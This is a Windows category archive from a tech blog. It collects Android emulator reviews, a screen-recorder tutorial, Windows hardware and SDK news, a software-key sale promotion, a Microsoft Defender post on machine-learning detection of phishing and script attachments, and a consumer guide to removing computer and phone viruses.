Category Archives: Windows

5 Best Android Emulators for Windows PC and Mac

Android gained popularity after Google took over the nascent startup and released it publicly in 2007. Since then, Android emulators for PC gained popularity for various reasons. Some use it for trying different apps before installing on their phones while others try it for business purposes. A new breed of users has emerged as well who utilize Android emulators for gaming. It can be attributed to games like PUBG Mobile

What is an Android emulator?

An Android emulator is an Android Virtual Device(AVD) that emulates the Android environment for other devices to run the Android operating system. It is generally used for testing, bug-finding, running various apps on a virtually controlled system on devices other than actual Android phones.

It lets the host(mainly computer system) behave like another hardware or software system for different purposes. The idea of Android emulator gained traction with the release of Android SDK by Google, in 2007(2008 for Public)

Here are some of the best Android emulators for PC

1. MemeU Play

First on the list is Android 5.1 Lolipop based Android emulator for Windows. It is among the most customizable Android emulators for PC in the segment.

The installation is quick and simple with no bloatware third-party apps to install like we come across in some emulators. The installer is also one fancy thing, I might add.

It takes around 2-3 minutes when launching for the first time. Time varies according to the processing power of your computer, among the performance of other components.

MemU, android emulators for PC

The emulator comes pre-loaded with some third party apps, preferably the ones sponsoring them so can’t really a complaint. There is no option to remove them. Honestly, I wouldn’t worry unless I’m running on 2 GIG of RAM and a Pentium 4 processor which really can’t handle multi-tasking.

One of the hot selling points of this emulator is Key Mapping. What Key-Mapping does is that you can put markers anywhere on the screen and assign a keyboard key or mouse button.
When you press that key or push a button, the controls or app present on that part of the screen gets pressed/triggered. It comes in handy when playing FPS, RPG or any game that require multiple button control.

The emulator is already keyboard-mouse compatible to an extent, worked with most of the games without any hiccup.

What I liked

Customizability: The emulator is flexible in terms of general resource usage. You can set the amount of RAM, Screen resolution, FPS, and graphics engine to be used by the emulator according to your machine’s capabilities.
Custom DNS, Root mode, and Cache performance policy can also be changed according to user’s requirements.

Key-mapping can help gamers play games with a variety of onscreen controls on the snap of a finger.

Cross-platform installation of apps is a bliss. You can browse folders present on Windows and install APKs directly without the intervention of Play store.

Even the option of synchronizing folders between Windows and emulator for a variety of purposes is provided. That makes it easier to transfer files from Windows filesystem to Emulator and vice-versa.

What I did not like

• Not really a con per se but Microphone integration could be more efficient given the stability the platform provides.

Download: HERE


2. Bluestacks 3

BlueStacks is one of the oldest emulators for Android out there that are still active in the market. It’s not a sin to say that perhaps it was the market-defining player during its peak days.

Blue Stacks 3 android emulator for windows

The key reason for its success was its ease of usability and access to the consumers. This android emulator is pretty easy to use and comes in FREE and PAID variants.

Installation is simple but filled with their sponsor ads. Setting up emulator is pretty easy. You launch the emulator and a welcome screen appears. You select the language and Google account sign window appears. Sign-in with a Google account and you are golden.

The ad-filled experience might be bitter-sweet for few as you launch the emulator, ad of some sponsored game appears in one tab.

Talking about ads and bloatware, the pre-installed apps are fewer than what you get on normal free versions of certain emulators. However, it is compensated by ads at various creative placement blocks

What I liked

• Ease of use. The emulator is extremely easy to use with one click Emulator setup.
• Separate key-mapping for different games
• Customizable resolution up to 4K
• Tabbed applications. Every application is windowed separately in a tab which can be closed
• Forum support. Being one of the segment leaders, Bluestacks has built quite a community on their forums. It is helpful for troubleshooting and creative aspects.

What I did not like

• Excessive ads. Given the competition in freeware segment, competitors are not flooding your screen with ads.
• Lacks native Android experience. Users who are looking for vanilla Android experience might not entertain such emulator.

Download: HERE


3. KOPlayer

Touted as the Android emulator for GAMING, it is an Android KitKat 4.4 operating system emulator.

In the era of Android P, this may seem like an obsolete choice for a general user. The emulator can be crucial for developers who are looking to test it on older versions of Android.

KOPlayer is a feature rich emulator, ideal for users looking to get the most of out if emulating experience.

Best Android emulator for PC

Android 4.4 is still used on over 11% of the smartphones based on Android OS, according to the official statistics by Google.

What I liked

• Drag and drop option between cross-platforms
• Dual-graphics option to switch according to the demand of the respective application
• Ease of access buttons on either side of the display
• One-click recording and basic editing. The edit video feature is pretty basic but still gets the thing done.

What I did not like

• It is not bug-free. Minor bugs pop up from time to time. One of them being unresponsiveness of the window.

Download: HERE


4. Nox Player

Amongst the list of best Android emulators for PC, this is one of the fastest, in terms of installation and operations. One click installation without any bloatware or third party apps.
The Android version is 4.4 KitKat.

Android emulator for PC

One of the things that stand out is the Macro step record option. You can record your steps in Macro recorder and re-enact them later.

Some apps only work for certain phone models and it really sucks when it is not compatible with the respective emulator.  This Android emulator has a workaround for that.

You need to hover over to settings. Set the respective smartphone model. By default, the only option you get is on Samsung smartphones. However, you set is on custom with the model of your choice with some custom presets available online.

You can drag and drop files from Windows to the emulator and vice-versa. It is a small but a useful feature.

For some odd reason, I could not find PUBG mobile on the Play Store. Only the competitors of the much-celebrated game were present.

What stands out

• Macro Recorder is helpful for developers, content creators
• You can lock the mouse to the emulator window. It is useful when playing video-games on the emulator so that your cursor/pointer does not fall out of the game’s scope.
• The full-screen mode is seamless. When I say seamless, it really is easy without any hiccup.

What can improve

• Computer resource usage for running the emulator can be optimized further.

Download: HERE


5. LeapDroid

Another Android Kitkat 4.4 based Android emulator for PC. Hands down the simplest Android emulator in the list.

free Android emulator for PC

Installation is fairly quick and bloatware free. There are no advanced features like the formerly mentioned emulators in the article.

You get Key Mapping feature to get around. The mouse 360-wheel mapping is something that is crucial while gaming. As soon as the emulator is installed, two virtual machines, named VM1 and VM2 are created. I honestly could not find a way to run more instances. However, two should suffice.

It is an easy going emulator for quick gaming and app testing/usage.

What I liked about it

• Simplicity
• Ease of use. The emulator is easy to operate and does not require a tutorial. I asked my neighbor’s kid who has a Samsung Tab. He found it easy to operate.
• Low resource usage

What could have been better

• APK integration from Windows
• Full screen(non-window) feature would have given a better emulation experience.

Download: HERE

It’s your turn now

I have listed some of the finest Android emulators for PC that are available out there. The right emulator for you will be solely based on your personal preference. It can be baffling for you to chose the best android emulator. I suggest you take it slow. Try the ones you find falling in your criterion.

Did I miss an emulator worth mentioning? Then let me know via the comment box

The post 5 Best Android Emulators for Windows PC and Mac appeared first on TechWorm.

How to Record Screen on Windows OS?

There are so many different purposes for which you can use a PC, from quality entertainment to earning a livelihood from the comfort of your home. To make things even better, you can record everything you do on your computer and share it with millions of people across the globe. Over the years, screen recording software has been steadily becoming more powerful and more available to gamers, online tutorial makers and professionals from all walks of life who want to share their skills and knowledge with their followers.

So if you want to join the growing population of screencasters, you’ve come to the right place, because in this article we will introduce you to how to use Windows built-in screen recording feature and one of the best screen recording software products for Windows to record your screen activities.

Windows Screen Recording With Filmora Scrn

Wondershare’s software has often been praised for its simplicity and Filmora Scrn is certainly not an exception. This screen recorder is perfectly suited for the newcomers to the world of screen recording, while it also delivers tools to skilled and experienced users who are looking to create high-quality footage.

Filmora scrn is available for both Windows and Mac users. If you haven’t installed it yet, just visit their official website and download and install.

Upon launching Filmora Scrn you’ll be asked whether you want to enter the Quick Capture mode or the software’s Video Editor. So in order to start your screen capturing session, you simply have to click on the Quick Capture button and proceed to adjust the settings.

You can specify the region of the screen you’d like to capture by selecting the Set a Custom Size Later option from the Screen Capture drop-down menu that can be accessed by clicking on the Setting button in the software’s Quick Capture widget. Afterwards, you can move around the rectangle that designates the area of the screen that will be recorded or drag its ends to define the region of the screen you want to capture precisely. The software also provides the Full-Screen option if you want to record the entire screen.

Filmora Scrn enables you to record activities on multiple monitors, which can be quite handy in a lot of different scenarios. In the Setting menu, you can find the Camera option that enables you to record footage using a webcam, while simultaneously capturing your desktop activities.

The audio recording options, Filmora Scrn offers allow you to record narration with an external microphone while you can record system audio independently or simultaneously with the sound recorded by an external microphone. This feature is extremely important if you want to create a tutorial or even a gaming video since you can provide instructions or comment on the events that take place in the screen recording.

The Advanced menu grants you access to HotKeys, Encode and General tabs, so you can select the location where the recording will be saved, set keyboard shortcuts or fine-tune the encoding features. After you’ve adjusted all the settings you can hit the Record button in the Quick Capture widget and start your screen capturing session.

You can always pause the recording by using a keyboard shortcut or by clicking on the Pause button that is located next to the Record button which also stops the recording. Keep in mind that you can add markers while the screen capturing session is still in progress if you want to highlight the most important parts of the video and speed up the video editing process.

Once the screen capturing session is over the video you created will be automatically imported into the software’s video editing mode. The file will be located in the Media Bin and in order to start editing it you’ll have to drag and drop it to the timeline. Filmora Scrn lets you cut or trim the video, so you can remove all of its parts you don’t want to feature in the final cut.

The Annotations tab lets you add captions, overlays, banners or to blur segments of the shot in order to conceal private information. Under the Cursor tab, you’ll be able to choose from several options that enlarge the cursor captured in the video and highlight the most important parts of the video. Exporting videos from Filmora Scrn is a simple process that doesn’t require you to be a video editing expert and the Wondershare’s software also enables you to share your videos directly to YouTube, Vimeo, Twitch or Facebook.

However, you can only save your videos as MP4, MOV, GIF and MP3 files, which somewhat limits your options, but if you just want to post your videos online you don’t really need a wide selection of video file formats. The video editing tools Filmora Scrn offers are optimized for the production of screen recordings, and the software is not best suited for more advanced video editing tasks.

Be it as it may, in my experience Filmora Scrn has always made the screen capturing process simple and easy, while it also enabled me to quickly edit and share the videos I created. Throughout the course of my career, I’ve had the opportunity to use a lot of different screen recorders, and none of them were so easy to use and still provided a set of powerful screen capturing tools. That’s the reason why I think that Filmora Scrn is currently one of the best screen recording software products for Windows on the market, and you can purchase the lifetime license to use it for just $29.99 or you can buy the one-year license of $19.99.

Recording Videos with Built-in Game DVR Tool on Windows 10

For the last few years, each new update of Windows 10 has also contained the Game DVR tool that enables you to capture the screen on your PC. Even though Game DVR primarily serves as a built-in tool for recording gameplay, you can also use it to record other desktop activities. But, it may not work with all Window-based software, and you’ll have to check if this tool is compatible with the software you’d like to record.

In order to bring up the Game Bar, you should launch the Xbox app first and then simply press Windows Logo and G keys and once it opens you can just hit the record button. Alternatively, you can hold a Windows Logo, Alt and R keys to start a new screen capturing session. Despite offering a relatively easy way to record video games the Game DVR tool doesn’t offer video editing options, which means that screen recording software like Filmora Scrn is a much better option.

Conclusion

Creating screencasts has so many different aspects, and in order to focus on the quality of the content you’re producing, you should choose a software such as Filmora Scrn that lets you control the screen capturing process completely and effortlessly.

Let us know in the comments section which method of screen recording you commonly use and hit share if you think your friends should know about Wondershare’s Filmora Scrn.

The post How to Record Screen on Windows OS? appeared first on TechWorm.

“Hey, Cortana, did Patch Tuesday fix a serious lock screen bug?”

This month’s Patch, er sorry, Update Tuesday includes fixes for 50 high-impact vulnerabilities in Microsoft Windows – 11 of which were rated Critical and 39 Important. The majority of the Critical bugs patched in this update affect the Edge browser, while most of the Important bugs belonged to Windows 10. One of the more interesting […]

Microsoft releases Windows 10 SDK Preview Build 17686

Windows 10 SDK preview build 17686 now available for developers

Last week, Microsoft had rolled out the Windows 10 SDK preview build 17682. And yesterday, the software giant rolled out the Windows 10 SDK Insider Preview Build 17686 for developers.

This newly released SDK doesn’t add anything in the way of features, as the company had last week only added MSIX Support, which came with build 17682. MSIX is an app packaging format that combines MSI and APPX. While developers can use the MakeAppx tool to package their application with MSIX, they should also note that MSIX support is currently unsupported by the App Certification Kit or the Microsoft Store.

The Preview SDK Build 17686 also contains bug fixes and underdevelopment changes to the API surface area. You can install this SDK and also continue to submit your apps that target Windows 10 Creators build or earlier to the store. This Windows SDK will now formally be only supported by Visual Studio 2017 and greater. Further, this SDK will only install on Windows 10 Insider Preview builds.

To download the updated preview SDK, click here. For more information, check out Microsoft’s full release notes.

The post Microsoft releases Windows 10 SDK Preview Build 17686 appeared first on TechWorm.

Laptops With 128GB of RAM Are Here

An anonymous reader quotes a report from The Verge: Brace yourself for laptops with 128GB of RAM because they're coming. Today, Lenovo announced its ThinkPad P52, which, along with that massive amount of memory, also features up to 6TB of storage, up to a 4K, 15.6-inch display, an eighth-gen Intel hexacore processor, and an Nvidia Quadro P3200 graphics card. The ThinkPad also includes two Thunderbolt three ports, HDMI 2.0, a mini DisplayPort, three USB Type-A ports, a headphone jack, and an Ethernet port. The company hasn't announced pricing yet, but it's likely going to try to compete with Dell's new 128GB-compatible workstation laptops. The Dell workstation laptops in question are the Precision 7730 and 7530, which are billed as "ready for VR" mobile workstations. According to TechRadar, "These again run with either 8th-gen Intel CPUs or Xeon processors, AMD Radeon WX or Nvidia Quadro graphics, and the potential to specify a whopping 128GB of 3200MHz system memory."

Read more of this story at Slashdot.

Hundreds of Thousands of Windows XP and Vista Users Won’t Be Able To Use Steam Soon

Windows XP and Vista users have six months to upgrade their operating systems or get the hell off of Steam. From a report: "Steam will officially stop supporting the Windows XP and Windows Vista operating systems," Valve, the company that operates Steam, said in a post to its XP and Vista support community. "This means that after that date the Steam Client will no longer run on those versions of Windows. In order to continue running Steam and any games or other products purchased through Steam, users will need to update to a more recent version of Windows."

Read more of this story at Slashdot.

0N9.COM SALE: 15% DISCOUNT OF WINDOWS 10 AND OFFICE 2016

0N9.COM offer the large range of PC games/expansion packs, Xbox live subscriptions & games, PlayStation Network cards/games and more. We provide the best price possible on the internet, instant delivery without wasting time for searching. Save money and enjoy your game quickly and safety!
Now 0n9.com sells software products such as Windows 10 Professional OEM Key and Microsoft Office 2016 Professional Plus Retail Key. People can click https://www.0n9.com/microsoft-office-2016-professional-plus-retail-key.html and https://www.0n9.com/windows-10-professional-oem-key.html to know more about them.By the way, there is also a 15% discount about our software by using the coupon SOFTTECH.

The post 0N9.COM SALE: 15% DISCOUNT OF WINDOWS 10 AND OFFICE 2016 appeared first on TechWorm.

Machine learning vs. social engineering

Machine learning is a key driver in the constant evolution of security technologies at Microsoft. Machine learning allows Microsoft 365 to scale next-gen protection capabilities and enhance cloud-based, real-time blocking of new and unknown threats. Just in the last few months, machine learning has helped us to protect hundreds of thousands of customers against ransomware, banking Trojan, and coin miner malware outbreaks.

But how does machine learning stack up against social engineering attacks?

Social engineering gives cybercriminals a way to get into systems and slip through defenses. Security investments, including the integration of advanced threat protection services in Windows, Office 365, and Enterprise Mobility + Security into Microsoft 365, have significantly raised the cost of attacks. The hardening of Windows 10 and Windows 10 in S mode, the advancement of browser security in Microsoft Edge, and the integrated stack of endpoint protection platform (EPP) and endpoint detection and response (EDR) capabilities in Windows Defender Advanced Threat Protection (Windows Defender ATP) further raise the bar in security. Attackers intent on overcoming these defenses to compromise devices are increasingly reliant on social engineering, banking on the susceptibility of users to open the gate to their devices.

Modern social engineering attacks use non-portable executable (PE) files like malicious scripts and macro-laced documents, typically in combination with social engineering lures. Every month, Windows Defender AV detects non-PE threats on over 10 million machines. These threats may be delivered as email attachments, through drive-by web downloads, removable drives, browser exploits, etc. The most common non-PE threat file types are JavaScript and VBScript.

Figure 1. Ten most prevalent non-PE threat file types encountered by Windows Defender AV

Non-PE threats are typically used as intermediary downloaders designed to deliver more dangerous executable malware payloads. Due to their flexibility, non-PE files are also used in various stages of the attack chain, including lateral movement and establishing fileless persistence. Machine learning allows us to scale protection against these threats in real-time, often protecting the first victim (patient zero).

Catching social engineering campaigns big and small

In mid-May, a small-scale, targeted spam campaign started distributing spear phishing emails that spoofed a landscaping business in Calgary, Canada. The attack was observed targeting less than 100 machines, mostly located in Canada. The spear phishing emails asked target victims to review an attached PDF document.

When opened, the PDF document presents itself as a secure document that requires action a very common social engineering technique used in enterprise phishing attacks. To view the supposed secure document, the target victim is instructed to click a link within the PDF, which opens a malicious website with a sign-in screen that asks for enterprise credentials.

Phished credentials can then be used for further attacks, including CEO fraud, additional spam campaigns, or remote access to the network for data theft or ransomware. Our machine learning blocked the PDF file as malware (Trojan:Script/Cloxer.A!cl) from the get-go, helping prevent the attack from succeeding.

Figure 2. Phishing email campaign with PDF attachment

Beyond targeted credential phishing attacks, we commonly see large-scale malware campaigns that use emails with archive attachments containing malicious VBScript or JavaScript files. These emails typically masquerade as an outstanding invoice, package delivery, or parking ticket, and instruct targets of the attack to refer to the attachment for more details. If the target opens the archive and runs the script, the malware typically downloads and runs further threats like ransomware or coin miners.

Figure 3. Typical social engineering email campaign with an archive attachment containing a malicious script

Malware campaigns like these, whether limited and targeted or large-scale and random, occur frequently. Attackers go to great lengths to avoid detection by heavily obfuscating code and modifying their attack code for each spam wave. Traditional methods of manually writing signatures identifying patterns in malware cannot effectively stop these attacks. The power of machine learning is that it is scalable and can be powerful enough to detect noisy, massive campaigns, but also specific enough to detect targeted attacks with very few signals. This flexibility means that we can stop a wide range of modern attacks automatically at the onset.

Machine learning models zero in on non-executable file types

To fight social engineering attacks, we build and train specialized machine learning models that are designed for specific file types.

Building high-quality specialized models requires good features for describing each file. For each file type, the full contents of hundreds of thousands of files are analyzed using large-scale distributed computing. Using machine learning, the best features that describe the content of each file type are selected. These features are deployed to the Windows Defender AV client to assist in describing the content of each file to machine learning models.

In addition to these ML-learned features, the models leverage expert researcher-created features and other useful file metadata to describe content. Because these ML models are trained for specific file types, they can zone in on the metadata of these file types.

Figure 4. Specialized file type-specific client ML models are paired with heavier cloud ML models to classify and protect against malicious script files in real-time

When the Windows Defender AV client encounters an unknown file, lightweight local ML models search for suspicious characteristics in the files features. Metadata for suspicious files are sent to the cloud protection service, where an array of bigger ML classifiers evaluate the file in real-time.

In both the client and the cloud, specialized file-type ML classifiers add to generic ML models to create multiple layers of classifiers that detect a wide range of malicious behavior. In the backend, deep-learning neural network models identify malicious scripts based on their full file content and behavior during detonation in a controlled sandbox. If a file is determined malicious, it is not allowed to run, preventing infection at the onset.

File type-specific ML classifiers are part of metadata-based ML models in the Windows Defender AV cloud protection service, which can make a verdict on suspicious files within a fraction of a second.

Figure 5. Layered machine learning models in Windows Defender ATP

File type-specific ML classifiers are also leveraged by ensemble models that learn and combine results from the whole array of cloud classifiers. This produces a comprehensive cloud-based machine learning stack that can protect against script-based attacks, including zero-day malware and highly targeted attacks. For example, the targeted phishing attack in mid-May was caught by a specialized PDF client-side machine learning model, as well as several cloud-based machine learning models, protecting customers in real-time.

Microsoft 365 threat protection powered by artificial intelligence and data sharing

Social engineering attacks that use non-portable executable (PE) threats are pervasive in todays threat landscape; the impact of combating these threats through machine learning is far-reaching.

Windows Defender AV combines local machine learning models, behavior-based detection algorithms, generics, and heuristics with a detonation system and powerful ML models in the cloud to provide real-time protection against polymorphic malware. Expert input from researchers, advanced technologies like Antimalware Scan Interface (AMSI), and rich intelligence from the Microsoft Intelligent Security Graph continue to enhance next-generation endpoint protection platform (EPP) capabilities in Windows Defender Advanced Threat Protection.

In addition to antivirus, components of Windows Defender ATPs interconnected security technologies defend against the multiple elements of social engineering attacks. Windows Defender SmartScreen in Microsoft Edge (also now available as a Google Chrome extension) blocks access to malicious URLs, such as those found in social engineering emails and documents. Network protection blocks malicious network communications, including those made by malicious scripts to download payloads. Attack surface reduction rules in Windows Defender Exploit Guard block Office-, script-, and email-based threats used in social engineering attacks. On the other hand, Windows Defender Application Control can block the installation of untrusted applications, including malware payloads of intermediary downloaders. These security solutions protect Windows 10 and Windows 10 in S mode from social engineering attacks.

Further, Windows Defender ATP endpoint detection and response (EDR) uses the power of machine learning and AMSI to unearth script-based attacks that live off the land. Windows Defender ATP allows security operations teams to detect and mitigate breaches and cyberattacks using advanced analytics and a rich detection library. With the April 2018 Update, automated investigation and advance hunting capabilities further enhance Windows Defender ATP. Sign up for a free trial.

Machine learning also powers Office 365 Advanced Threat Protection to detect non-PE attachments in social engineering spam campaigns that distribute malware or steal user credentials. This enhances the Office 365 ATP comprehensive and multi-layered solution to protect mailboxes, files, online storage, and applications against threats.

These and other technologies power Microsoft 365 threat protection to defend the modern workplace. In Windows 10 April 2018 Update, we enhanced signal sharing across advanced threat protection services in Windows, Office 365, and Enterprise Mobility + Security through the Microsoft Intelligent Security Graph. This integration enables these technologies to automatically update protection and detection and orchestrate remediation across Microsoft 365.

 

Gregory Ellison and Geoff McDonald
Windows Defender Research

 

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Qualcomm Unveils Snapdragon 850 Platform Targeted For Windows 10 PCs

MojoKid writes: Qualcomm's Always-Connected Windows 10 PC initiative with Microsoft kicks into another gear this morning with the announcement of the Qualcomm Snapdragon 850 Mobile Platform for Windows 10 PCs. Based on what looks to be an optimized version of the Snapdragon 845 specifically tuned for laptops and 2-in-1 convertibles, the Snapdragon 850 promises a 30 percent boost in system-wide performance versus the previous generation Snapdragon 835 platform, while its integrated Snapdragon X20 LTE modem promises peak speeds of 1.2Gbps. When it comes to battery life, Qualcomm says that PCs running the Snapdragon 850 will be able to top 25 hours of runtime. Qualcomm also notes it will have many more OEM partners and a lot more device options to choose from (hopefully at lower price points) this time around. Couple that with Microsoft's new support for the ARM64 SDK in Windows 10, and things could get interesting for this new class of machine. No word on availability just yet, beyond the note that devices will be available in market later this year.

Read more of this story at Slashdot.

Dell is Reportedly Working on a Dual-Screen Windows ARM Device

Dell is working on a foldable dual-screen device, according to a report. According to news blog WinFuture, Dell's supposedly forthcoming device would run Windows 10 and an unreleased Qualcomm Snapdragon 850 ARM processor. From a report: Dell's device is reportedly codenamed "Januss," and has been under development since last summer, but it's not clear whether the device will ever come to market. Dell was working on mobile Windows devices before, and those devices were canceled. Microsoft also canceled its own Surface Mini device, just weeks before it was due to be revealed. The Verge understands that the documents WinFuture has obtained are old, and that Dell could have altered its product plans by now.

Read more of this story at Slashdot.

Windows Server 2016 Has an Update Problem, Users Say

madsci1016 writes: Frustrated with how long my Windows Server 2016 Essentials was taking to apply weekly updates, I turned to the web. A quick search revealed that I'm not alone. Many people are reporting similar experiences across the web. All sharing stories of weekly patching taking hours and sometimes ending in hung welcome screens. Some of these threads started a year ago and are still active, with no response from Microsoft addressing the issue. If you use Server 2016, have you experienced this problem?

Read more of this story at Slashdot.

Windows 10 Pro Is a Dead End For the Enterprise, Gartner Says

A prominent Gartner analyst argues that Windows 10 Pro is a dead end for enterprises, citing recent changes by Microsoft to the Windows 10 support schedule. "[We] predict that Microsoft will continue positioning Windows [10] Pro as a release that is not appropriate for enterprises by reducing [...] support and limiting access to enterprise management features," Stephen Kleynhans, a research vice president at Gartner and one of the research firm's resident Windows experts, said in a report he co-authored. Computerworld reports: Last year, the Redmond, Wash. developer announced a six-month support extension for Windows 10 1511, the November 2015 feature upgrade, "to help some early enterprise adopters that are still finishing their transition to Windows as a service." In February, Microsoft added versions 1609, 1703 and 1709 -- released in mid-2016, and in April and October of 2017, respectively -- to the extended support list, giving each 24 months of support, not the usual 18. There was a catch: Only Windows 10 Enterprise (and Windows 10 Education, a similar version for public and private school districts and universities) qualified for the extra six months of support. Users running Windows 10 Pro were still required to upgrade to a successor SKU (stock-keeping unit) within 18 months to continue receiving security patches and other bug fixes. Another component of Microsoft's current Windows 10 support strategy, something the company has labeled "paid supplemental servicing," was also out of bounds for those running Windows 10 Pro. The extra support, which Microsoft will sell at an undisclosed price, is available only to Enterprise and Education customers. Paid supplemental servicing adds 12 months to the 18 months provided free of charge.

Read more of this story at Slashdot.

Windows 10 Spring Update Improves Linux On WSL With Unix Sockets and More

Billly Gates writes: Windows 10 build 1803 has come out this month, but with some problems. AnandTech has a deep-dive with the review examing many new features including the much better support for Linux. WSL (Windows Subsystem for Linux) now has native Curt and Tar from the command prompt as well as a utility to convert Unix to Windows pathnames called WSLpath.exe which is documented here. In addition it was mentioned on Slashdot in the past about OpenSSH being ported natively to Win32 in certain early builds. It now seems the reason was for Linux interoperability with this Spring Update 2. Unix sockets mean you can run Kali Linux on Windows 10 for penetration testing or run an Apache server in the background with full Linux networking support. Deemons now run in the background even with the command prompt closed. [...]

Read more of this story at Slashdot.

How to Get Rid of a Virus

Finding out that your computer or laptop is infected with a virus is a scary feeling. You may have important files on the hard drive, irreplaceable photos, or an in-progress project that you forgot to save. Viruses and malware can be a significant threat to your data and your personal information and can impact the way your computer performs.

While there are a variety of reasons your computer can be running slowly, it’s best to rule out malware first if your computer is acting up. Since viruses are tricky to get rid of, we put together a step-by-step guide on how to get rid of a virus from start to finish.

Virus Detection

Before you go knee deep in cleaning out your computer, it’s important to make sure to detect that you have a virus. A few telltale signs that your computer is infected are:

  • Pop up messages are appearing often. These are constantly popping up every time you are on your computer, and they are hard to x out of or get rid of. Never click on a suspicious pop up even if it says a virus has been detected as this could be a fake antivirus system.
  • Your computer is running slowly. Make sure that all of your applications and systems are up to date. If it’s still slow, it’s probably a virus that is hijacking your browser using advertising or phishing sites.
  • Your hard drive is making noise. If your hard disk is making continuous noises or spins with minimal to no computer activity, your PC could be infected.
  • Programs are continually crashing. If programs are starting and closing automatically, or your system randomly shuts down or freezes, your computer could be experiencing a virus.
  • You have missing files. If you are missing files that you know were not deleted, this may be due to malware. Some malware creates issues by deleting files and moving them around or encrypting files so you cannot open them.
  • High network activity. If your wifi or internet activity is very active even when you are not using it, a virus could be infiltrating your internet to send information back and forth.

Method 1: Scanning

Before beginning the virus removal process, be sure that all of your important data is backed up. This will ensure any valuable files will be safe before you clean your computer. A good thing to do is scan all your personal data before copying to an external hard drive. There are many programs for spyware/virus removal and many are free. Panda Security has two free scanning tools to disinfect your PC in a few easy steps. The Panda Cloud Cleaner and the Panda Cloud Cleaner rescue USB drive which we will discuss in the next section.

If you haven’t already, make sure to have an antivirus program installed. Install an antivirus system that also protects against ransomware as well, as programs with both can pick up things that an antivirus program alone does not recognize. You’ll then want to reboot your computer to Safe Mode. A virus can only access your computer when it’s running. Some viruses run by attaching themselves to the startup program when Windows loads. When placed in Safe Mode, your computer will only load the essential files, which can stop all viruses from starting. You can then identify them and remove them.

Once all of your scanning is complete, you will receive a summary of the malware found. Review the detection list and avoid accidental removal of legitimate programs and be sure to clean the malware. Then, reboot your computer or restart and test your computer’s performance. Try a web browser or whatever program that was causing your trouble to begin with. If your computer appears to be running smoothly, it is probably safe from viruses.

Method 2: Rescue Disk/USB Drive

If your computer cannot start because of the virus, you may have to use a rescue USB drive or rescue disk. A rescue USB drive allows you to scan the computer without the need to start the computer. Using another computer, download an ISO image file from your anti-virus company and burn it onto a disk or USB drive.

Then boot to this disc or USB drive instead of the normal Windows install and run your anti-virus software from there. Since your computer is not running, the infection should not be able to interfere and you’ll have a better opportunity to rid the virus. Most computers can be booted up from a rescue USB. Click here for more detailed information on Panda Security’s Cloud Cleaner rescue USB.

Method 3: Removing a Virus Manually

Some viruses need to be removed manually. Make sure you are only tackling this if you know Windows well and know how to view and delete program files. If you feel comfortable, download an Autorun that allows you to see exactly what it is that is operating on your computer and how to get rid of it. After you download Autoruns, make sure it is in a convenient folder or access spot to be retrieved later on.

Run the program and be mindful that there are a lot of areas of that may be unfamiliar. Make it easier on yourself and disable reporting of certain signed Microsoft services, and programs that you know are not a malware. Filter your options to verify code signatures, include empty locations and hide the Microsoft entries.

Then, reboot into Safe Mode with networking. This will allow you to use the internet to look up these suspicious programs that are starting with your computer. Start the Autoruns program and begin searching for suspicious entries.

Next, begin searching for suspicious entries. This can be overwhelming, but it’s important to take your time when searching for viruses. Looking at both the entry name and file location, determine the legitimacy of the name by searching it on a process identifier online that can tell you exactly what the process is and if it’s a potential risk. Read the Logon and Services tabs which will provide filtered information for you. Also, in order to be thorough, take your time when going through these processes.

If you can, record the file location and any other relevant information before you delete it. Right-click on a malware and click delete. Delete all associated files, and delete each entry one at a time to be safe. Once you delete the malware and files, be sure to empty your trash bin on your desktop and restarting your computer.

Method 4: Clean Install

This is probably the most tedious of the bunch, but it is almost a guaranteed way to rid your computer of viruses and malware. A clean install deletes everything on your hard drive, so this is one where you will also want to transfer your photos and text documents to an external hard drive. Be sure to scan and make sure these have not been infected as well. You will have to reinstall all programs, but it can save your computer from further infiltration and destruction due to viruses.

With the newest version of Windows (Windows 8.1 and 10), there are a few ways to clean install depending on what you have on your computer. You can clean install from a DVD/USB drive, using reset, or perform a clean install within a running version. With a DVD or USB drive, you will need a product key to run a clean install.

With a running version, you want to choose “keep nothing” when it comes to what the drive should keep after the clean install. This is necessary if the other methods have not worked and you need to wipe the hard drive. Read here to learn how to build in the Reset function to clean install.

Removing a Virus from a Mac

While many people believe they cannot get viruses or malware on Macs, these devices can also be infected. There are common names posing as Mac antiviruses such as MacDefender and MacSecurity that are malicious and designed to trap Mac users into entering their Apple ID accounts and submitting their credit cards. If you receive a message while browsing the internet that involves something wrong with your Mac, or “download here to keep your Mac safe”, ignore these messages and quit the browser you are on.

Make sure there are no downloads installed or downloading, and immediately put these in the trash. If it seems the malware is already installed on your Mac, quit whatever app or program you think could be infected and launch your Activity Monitor. Once you’ve located the app in quetesed, search the common Mac malware terms we’ve listed above. If you identify malware, click Quite Process and quit the Activity Monitor. Delete the application from your device entirely. Make sure your software and applications are always up to date and download a Mac antivirus system in order to browse the internet safely on your Mac.

In order to prevent a virus, be sure to download a secure antivirus system on your computer if you haven’t already. Update your software as often as you can, since viruses are constantly changing and updating in order to outsmart your system. Also, backup your data regularly to ensure you will not lose previous files if ever infected with a virus. Be wary of the emails you receive and don’t open any suspicious looking files or links.

Removing a Virus from an Android Phone

If you believe your Android phone has been compromised with a virus, the same rules apply when determining if your phone has a virus. If there is a surge in data usage, unexplained charges, unwanted apps or sudden pop ups, you could be under a hack. If you start to detect drastic reductions in battery life with your phone, it could also be infected with a virus. There are a few steps to removing a virus from an android phone.

You can remove a virus by putting your phone or tablet into Safe Mode. This will prevent any third-party apps from running, including malware. Press the power button to access the power off options, then click restart in Safe Mode. Once in Safe Mode, you can open your Settings and choose Apps or Application Manager.

Take a look at the list of apps and make sure there isn’t anything odd or unfamiliar. Make sure you are looking at the Downloaded tab to see what’s installed on your Android. You’ll also want to clear your app’s data cache by selecting “Clear Cache” before deleting. Then delete the app’s data choosing “Clear Data”. Click uninstall to fully remove the app.

Usually this should remove the virus. However, in some cases you might find that the Uninstall button is greyed out and inaccessible. This is because the virus has given itself Device Administrator access. You’ll need to exit the Apps menu and tap on Settings>Security>Device Administrators. This is where you’ll find a list of apps on your device with administrator status. Untick the box for the app you’d like to remove and then tap Deactivate.

You should now be able to return to the original apps menu and remove that app. Now that the virus is removed, restart your device and turn off Safe mode. Once your virus is removed be sure to back up any important information you have on your device, and install an Android antivirus to avoid future breaches.

